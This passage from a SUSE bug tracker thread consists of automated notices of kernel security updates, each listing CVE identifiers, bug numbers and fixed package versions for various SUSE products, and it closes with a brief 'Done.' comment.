SUSE OpenStack Cloud Crowbar 9 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE OpenStack Cloud 9 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    kernel-default-4.12.14-95.96.1, kernel-source-4.12.14-95.96.1, kernel-syms-4.12.14-95.96.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kernel-default-4.12.14-95.96.1, kgraft-patch-SLE12-SP4_Update_26-1-6.3.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.96.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 48 Swamp Workflow Management 2022-04-20 10:23:07 UTC

SUSE-SU-2022:1270-1: An update that fixes 13 vulnerabilities is now available.

Category: security (important)
Bug References: 1189562,1196018,1196488,1196761,1196830,1196836,1197227,1197331,1197366
CVE References: CVE-2021-45868,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src):    kernel-default-4.4.180-94.161.1, kernel-source-4.4.180-94.161.1, kernel-syms-4.4.180-94.161.1, kgraft-patch-SLE12-SP3_Update_44-1-4.5.1
SUSE OpenStack Cloud 8 (src):    kernel-default-4.4.180-94.161.1, kernel-source-4.4.180-94.161.1, kernel-syms-4.4.180-94.161.1, kgraft-patch-SLE12-SP3_Update_44-1-4.5.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    kernel-default-4.4.180-94.161.1, kernel-source-4.4.180-94.161.1, kernel-syms-4.4.180-94.161.1, kgraft-patch-SLE12-SP3_Update_44-1-4.5.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    kernel-default-4.4.180-94.161.1, kernel-source-4.4.180-94.161.1, kernel-syms-4.4.180-94.161.1, kgraft-patch-SLE12-SP3_Update_44-1-4.5.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    kernel-default-4.4.180-94.161.1, kernel-source-4.4.180-94.161.1, kernel-syms-4.4.180-94.161.1
SUSE Linux Enterprise High Availability 12-SP3 (src):    kernel-default-4.4.180-94.161.1
HPE Helion Openstack 8 (src):    kernel-default-4.4.180-94.161.1, kernel-source-4.4.180-94.161.1, kernel-syms-4.4.180-94.161.1, kgraft-patch-SLE12-SP3_Update_44-1-4.5.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 49 Swamp Workflow Management 2022-04-20 16:21:45 UTC

SUSE-SU-2022:1283-1: An update that fixes 13 vulnerabilities is now available.

Category: security (important)
Bug References: 1189562,1196018,1196488,1196761,1196830,1196836,1197227,1197331,1197366
CVE References: CVE-2021-45868,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 12-SP2-BCL (src):    kernel-default-4.4.121-92.172.1, kernel-source-4.4.121-92.172.1, kernel-syms-4.4.121-92.172.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 52 Swamp Workflow Management 2022-04-26 10:22:55 UTC

SUSE-SU-2022:1402-1: An update that solves 20 vulnerabilities, contains three features and has 38 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196723,1196761,1196830,1196836,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197391,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28356,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.84.1, kernel-rt_debug-4.12.14-10.84.1, kernel-source-rt-4.12.14-10.84.1, kernel-syms-rt-4.12.14-10.84.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 53 Swamp Workflow Management 2022-04-26 16:21:29 UTC

SUSE-SU-2022:1407-1: An update that solves 15 vulnerabilities and has 34 fixes is now available.

Category: security (important)
Bug References: 1065729,1156395,1175667,1177028,1178134,1179639,1180153,1189562,1194625,1194649,1195640,1195926,1196018,1196196,1196478,1196761,1196823,1197227,1197243,1197300,1197302,1197331,1197343,1197366,1197389,1197462,1197501,1197534,1197661,1197675,1197677,1197702,1197811,1197812,1197815,1197817,1197819,1197820,1197888,1197889,1197894,1198027,1198028,1198029,1198030,1198031,1198032,1198033,1198077
CVE References: CVE-2021-45868,CVE-2022-0850,CVE-2022-0854,CVE-2022-1011,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-1195,CVE-2022-1198,CVE-2022-1199,CVE-2022-1205,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: 
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.85.1, kernel-rt_debug-5.3.18-150300.85.1, kernel-source-rt-5.3.18-150300.85.1, kernel-syms-rt-5.3.18-150300.85.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.85.1
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.85.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 63 Gabriele Sonnu 2022-07-04 13:21:30 UTC

Done.